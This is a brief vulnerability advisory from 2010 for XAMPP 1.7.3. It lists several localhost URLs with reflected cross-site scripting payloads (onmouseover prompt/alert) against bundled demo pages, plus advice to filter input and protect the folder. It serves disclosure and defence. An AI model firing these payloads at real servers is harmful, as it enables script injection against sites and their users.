#********************************************************** # Exploit Title: Xampp 1.7.3 multiple vulnerabilities # Date: 11/06/2010 # Author: Sangteamtham # Software Link: http://www.apachefriends.org/en/xampp.html # Version: 1.7.3 # Tested on: Windows 7 # Email: Sangteamtham@gmail.com # Blog: http://sangte.blogspot.com/ # Homepage: http://hcegroup.net/hceteam #*********************************************************** 1.Description: XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start. 2. Vulnerabilities: http://localhost/xampp/ming.php/" http://localhost/xampp/iart.php/"onmouseover=prompt("XSS")> http://localhost/xampp/cds.php/'onmouseover=alert("XSS")> http://localhost/xampp/aspinfo.asp/1 http://localhost/xampp/adodb.php/"onmouseover=prompt("XSS")> http://localhost/xampp/perlinfo.pl/1 3. Poc: 4. Patch: Vender should filter the special characters when input the form. Clients should set password access to xampp folder. 5. Credits: Thanks flying to Vietnamese hackers and all hackers out there researching for more security. *************************************************************